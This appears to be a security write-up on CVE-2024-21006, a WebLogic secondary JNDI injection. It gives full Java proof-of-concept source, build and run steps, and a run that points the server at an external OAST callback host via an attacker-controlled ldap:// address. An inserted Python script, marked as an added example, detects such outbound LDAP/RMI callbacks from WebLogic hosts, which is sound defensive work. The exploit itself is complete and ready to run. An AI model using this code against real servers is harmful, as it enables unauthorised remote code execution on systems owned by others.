WebLogic — CVE-2024-21006

CVE-2024-21006 reveals a new WebLogic attack method, secondary JNDI injection: a second JNDI lookup is triggered while the server is still resolving a first, attacker-bound JNDI object, and that nested lookup completes the chain to RCE.

This project is based on the findings of pwnull and code from momika223.

Proof-of-Concept

Oracle 14.1.1.0

```bash
apt :: ~ » docker container ls
CONTAINER ID   IMAGE                                                        COMMAND                  CREATED        STATUS       PORTS                                                                                  NAMES
fa9822b7dfd5   container-registry.oracle.com/middleware/weblogic:14.1.1.0   "/u01/oracle/createA…"   23 hours ago   Up 2 hours   0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp   14110-weblogic
```

Prepare the environment by uploading MainClass.java and META-INF/MANIFEST.MF into the WebLogic container (in this run they are fetched from a web server on the Docker host, 172.17.0.1).

```bash
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MainClass.java
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MANIFEST.MF
[oracle@14110-weblogic lib]$ mkdir META-INF
[oracle@14110-weblogic lib]$ mv MANIFEST.MF META-INF/
```

Compile the code against weblogic.jar and package it, together with the manifest, into a runnable jar.

```bash
[oracle@14110-weblogic lib]$ javac -cp /u01/oracle/wlserver/server/lib/weblogic.jar MainClass.java
[oracle@14110-weblogic lib]$ ls -al | grep MainClass
-rw-rw-r-- 1 oracle oracle    2033 Oct 10 08:03 MainClass$1.class
-rw-rw-r-- 1 oracle oracle    1386 Oct 10 08:03 MainClass.class
-rw-rw-r-- 1 oracle oracle    3717 Oct 10 08:01 MainClass.java

[oracle@14110-weblogic lib]$ jar cvfm cve-2024-21006.jar META-INF/MANIFEST.MF *.class
added manifest
adding: MainClass$1.class(in = 2033) (out= 671)(deflated 66%)
adding: MainClass.class(in = 2161) (out= 1100)(deflated 49%)
```

Run the PoC against the local server. The last prompt takes the address of the attacker-controlled JNDI server that the WebLogic process will connect out to during the nested lookup.

```bash
[oracle@14110-weblogic lib]$ java -jar cve-2024-21006.jar
Target IP: 127.0.0.1
Target Port: 7001
RMI Address (ip:port/exp): wssm1qvzn5i56ehqjskcwdmtckib639ry.oastify.com
```
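The run above ends with the WebLogic server itself opening a connection to an external JNDI address (here an OAST hostname) while it resolves the bound reference. That server-initiated callback is the observable a defender can hunt for: an application server reaching out to LDAP or RMI ports on hosts that are not its directory infrastructure. The following detection script is an added example and is not part of the original writeup or its code; the firewall log format, the addresses, the allow-listed directory network and the WebLogic host address are all constructed for illustration.

```python
"""Flag outbound JNDI-style callbacks initiated by a WebLogic host.

Added example, not part of the CVE-2024-21006 writeup. The log format,
IP addresses and allow-list below are constructed for illustration.
"""
import ipaddress
import re
from dataclasses import dataclass

# Ports that JNDI provider URLs normally point at: ldap, ldaps, rmi.
JNDI_CALLBACK_PORTS = {389, 636, 1099}

# Directory servers the application tier may legitimately bind to (assumed).
ALLOWED_DESTINATIONS = [ipaddress.ip_network("10.0.5.0/24")]

# RFC 1918 space; anything outside it is treated as an external callback.
INTERNAL_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]

# WebLogic managed-server addresses whose egress is being watched (assumed).
WEBLOGIC_HOSTS = {ipaddress.ip_address("10.0.1.20")}

# Constructed firewall line: "<ts> ALLOW|DENY src=<ip>:<port> dst=<ip>:<port> proto=tcp"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ALLOW|DENY) "
    r"src=(?P<src>[\d.]+):(?P<sport>\d+) "
    r"dst=(?P<dst>[\d.]+):(?P<dport>\d+) proto=tcp$"
)


@dataclass(frozen=True)
class Alert:
    ts: str
    src: str
    dst: str
    dport: int
    action: str
    reason: str


def parse_line(line):
    """Return the named fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def in_any(addr, networks):
    return any(addr in net for net in networks)


def detect_jndi_egress(lines):
    """Return one Alert per connection where a WebLogic host initiated a
    connection to an LDAP/RMI port on a destination outside the allow-list.
    Denied connections are still reported: the attempt itself is the signal."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        src = ipaddress.ip_address(rec["src"])
        dst = ipaddress.ip_address(rec["dst"])
        dport = int(rec["dport"])
        if src not in WEBLOGIC_HOSTS or dport not in JNDI_CALLBACK_PORTS:
            continue
        if in_any(dst, ALLOWED_DESTINATIONS):
            continue
        scope = "internal" if in_any(dst, INTERNAL_NETWORKS) else "external"
        reason = f"app server initiated LDAP/RMI connection to {scope} non-allow-listed host"
        alerts.append(Alert(rec["ts"], str(src), str(dst), dport, rec["action"], reason))
    return alerts


# Constructed sample: one normal directory bind, two callback attempts,
# one unrelated host, one unparseable line.
SAMPLE_LOG = [
    "2024-10-10T08:05:01Z ALLOW src=10.0.1.20:51022 dst=10.0.5.10:389 proto=tcp",
    "2024-10-10T08:05:07Z ALLOW src=10.0.1.20:51030 dst=203.0.113.77:389 proto=tcp",
    "2024-10-10T08:05:09Z DENY src=10.0.1.20:51031 dst=203.0.113.77:1099 proto=tcp",
    "2024-10-10T08:05:12Z ALLOW src=10.0.2.9:40001 dst=203.0.113.77:389 proto=tcp",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for a in detect_jndi_egress(SAMPLE_LOG):
        print(f"{a.ts} {a.action} {a.src} -> {a.dst}:{a.dport}  {a.reason}")
```

The rule is deliberately narrow: it keys on the source being an application server and the destination port being one JNDI providers use, so ordinary client traffic to the directory is not flagged. In an environment where the application tier has no business resolving JNDI names from anywhere but its own directory, the same allow-list can be enforced as an egress filter rather than only monitored.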

Source code

MainClass.java

```java
import weblogic.j2ee.descriptor.InjectionTargetBean;
import weblogic.j2ee.descriptor.MessageDestinationRefBean;
import javax.naming.*;
import java.util.Scanner;
import java.util.Hashtable;
import java.util.Random;

public class MainClass {

    public static void main(String[] args) throws Exception {
        Scanner scanner = new Scanner(System.in);
        System.out.print("Target IP: ");
        String ip = scanner.nextLine();
        System.out.print("Target Port: ");
        String port = scanner.nextLine();
        System.out.print("RMI Address (ip:port/exp): ");
        String rmiexp = scanner.nextLine();
        // Random suffix so repeated runs do not collide on the same bind name.
        Random bindname = new Random();
        int bindint = bindname.nextInt(10000);

        // Connect to the target over IIOP using WebLogic's own initial context factory.
        String rhost = String.format("iiop://%s:%s", ip, port);
        Hashtable<String, String> env = new Hashtable<String, String>();
        env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
        env.put(Context.PROVIDER_URL, rhost);
        Context context = new InitialContext(env);

        // The reference's destination name is a JNDI URL; resolving it is the second
        // (nested) lookup described above. The bean is a stub implementation.
        weblogic.application.naming.MessageDestinationReference messageDestinationReference =
            new weblogic.application.naming.MessageDestinationReference(null, new MessageDestinationRefBean() {
            @Override
            public String[] getDescriptions() {
                return new String[0];
            }

            @Override
            public void addDescription(String s) {
            }

            @Override
            public void removeDescription(String s) {
            }

            @Override
            public void setDescriptions(String[] strings) {
            }

            @Override
            public String getMessageDestinationRefName() {
                return null;
            }

            @Override
            public void setMessageDestinationRefName(String s) {
            }

            @Override
            public String getMessageDestinationType() {
                return "weblogic.application.naming.MessageDestinationReference";
            }

            @Override
            public void setMessageDestinationType(String s) {
            }

            @Override
            public String getMessageDestinationUsage() {
                return null;
            }

            @Override
            public void setMessageDestinationUsage(String s) {
            }

            @Override
            public String getMessageDestinationLink() {
                return null;
            }

            @Override
            public void setMessageDestinationLink(String s) {
            }

            @Override
            public String getMappedName() {
                return null;
            }

            @Override
            public void setMappedName(String s) {
            }

            @Override
            public InjectionTargetBean[] getInjectionTargets() {
                return new InjectionTargetBean[0];
            }

            @Override
            public InjectionTargetBean createInjectionTarget() {
                return null;
            }

            @Override
            public void destroyInjectionTarget(InjectionTargetBean injectionTargetBean) {
            }

            @Override
            public String getLookupName() {
                return null;
            }

            @Override
            public void setLookupName(String s) {
            }

            @Override
            public String getId() {
                return null;
            }

            @Override
            public void setId(String s) {
            }
        }, "ldap://" + rmiexp, null, null);

        // Bind the reference on the server, then look it up: the server resolves it.
        context.bind("pthree" + bindint, messageDestinationReference);
        context.lookup("pthree" + bindint);
    }
}
```

META-INF/MANIFEST.MF

```text
Manifest-Version: 1.0
Main-Class: MainClass
Class-Path: /u01/oracle/wlserver/server/lib/weblogic.jar
```

Disclaimer

All content published on exploit.se is intended strictly for educational and informational purposes. Research is conducted responsibly under coordinated disclosure principles.

Techniques, tools, and writeups shared on this site are meant to advance the security community's understanding of vulnerabilities and defences. They are not intended to encourage or enable unauthorised access to any system.

The author bears no responsibility for any misuse of information presented here.
